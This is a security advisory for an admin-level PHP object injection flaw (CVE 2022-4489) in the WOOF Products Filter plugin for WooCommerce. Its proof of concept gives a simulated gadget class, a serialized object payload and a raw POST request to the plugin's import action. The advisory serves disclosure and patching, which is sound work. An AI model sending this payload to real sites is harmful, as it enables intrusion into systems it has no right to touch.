WOOF – Products Filter for WooCommerce < 1.3.2 – Admin+ PHP Object Injection | CVE 2022-4489

Description

The plugin unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

Proof of Concept

1. To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

2. First, enable Import/Export extension: WooCommerce > Settings > Products Filter > Extensions > Tick the box Import/Export > Save changes (requires the "WooCommerce" plugin to be active)

3. Use "Export/Import" function in WooCommerce > Settings > Products Filter > Advanced > Export/Import, and enter with the following content: {"evil":"O:4:\"Evil\":0:{}"}

4. When clicking "Import placed data", click "OK", We will get an "Arbitrary deserialization" message.

POST /wp-admin/admin-ajax.php HTTP/1.1

action=woof_do_import_data&import_value=%7B%22evil%22%3A%22O%3A4%3A%5C%22Evil%5C%22%3A0%3A%7B%7D%22%7D